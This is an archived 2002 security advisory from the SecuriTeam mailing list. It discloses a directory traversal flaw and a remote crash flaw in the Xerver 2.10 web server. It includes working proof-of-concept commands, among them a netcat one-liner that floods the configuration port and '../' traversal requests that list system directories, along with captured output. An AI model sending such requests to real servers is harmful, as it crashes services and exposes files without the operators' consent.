[NEWS] Xerver 2.10 Directory Traversal and DoS

From: support@securiteam.com
Date: 03/09/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 00:30:00 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Xerver 2.10 Directory Traversal and DoS
------------------------------------------------------------------------

SUMMARY

 <http://www.javascript.nu/xerver/> Xerver Free Web Server is a tiny web
server allowing you to run CGI/perl scripts on your computer. Xerver is a
tiny, fast and free web server, but is still advanced and supports both
HTTP/1.1 and HTTP/1.0 and all HTTP methods (GET, POST and HEAD).

Xerver v2.1 suffers from a directory traversal vulnerability that allows
to view directory listings, and to a DoS bug that enables to crash the web
server remotely.

DETAILS

Vulnerable systems:
Xerver v2.10 for Windows, Linux, BSD, Solaris, and MAC

Port 32123 is usually used for server configuration. It is possible to
crash the server remotely by requesting the URL "C:\" several times.

Example:
$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1
32123

Another bug enables any remote user to view directory listings using
standard web requests.

Example 1:
$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY
BGCOLOR=white COL
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for
/</H2></F
ONT><PRE> <B>File name File size&nb
sp; Last modified</B>

Program Files
--------------------------------------------------------------------------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFold
er" BORDER=0> Program Files</A>
--------------------------------------------------------------------------------

RECYCLER
--------------------------------------------------------------------------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" B
ORDER=0> RECYCLER</A>
--------------------------------------------------------------------------------

WINNT
--------------------------------------------------------------------------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" BORD
ER=0> WINNT</A>
-------------------------------------------------------------------------------

[...]

Accessing the following URL:
http://localhost/unix/ALEX/Xerver2.10/../../../

Results in:

Directory Listing for /

    File name File size Last modified

 $unix
 ALEX
 Documents and Settings
 My Downloads
 Program Files
 RECYCLER

[...]

Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The results is:

Directory Listing for /WINNT/system32/

File name File size Last modified
 ../
 AdCache
 CatRoot
 Com
 DTCLog
 DirectX
 GroupPolicy
 Hummbird
 IOSUBSYS
 Macromed
 Microsoft

[...]

Vendor Response:
The vendor was notified.

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com>
Alex Hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: manage server not on start menu
    ... harddrive array with 3 SCSI harddrives and has 2 network ... I have looked in Program files and can't find the ... Microsoft Small Business Server folder. ...
    (microsoft.public.backoffice.smallbiz2000)
  • Re: Problem with 40tude Dialog
    ... I want to subscribe to newsgroups from two servers. ... I got the newsgroup list from the first server and subscribed ... the first time as admin from the installer but subsequent runs were as ... Dialog should run okay when installed in "Program Files" ...
    (news.software.readers)
  • Re: What should I Do?
    ... My thought was that I should move the program files back to the C:/ drive ... someone else takes over the server then it's been set up properly. ... >> Also came to find out that all servers have mirrored drives. ... >> it's just a partition off the same physical drive or because they are just ...
    (microsoft.public.sqlserver.server)
  • Re: scandir on HTTP
    ... there isn't any standard to send directory listings through HTTP. ... server. ... You might be interested in writing your own HTML parsing routines but that implies that the remote server is configured to send directory listings. ...
    (comp.lang.php)
  • VPN General Question
    ... I'm new to this newsgroup and to Windows 2000 Server technology, ... only 2 or 3 people will need to access the program files ...
    (microsoft.public.windows.server.networking)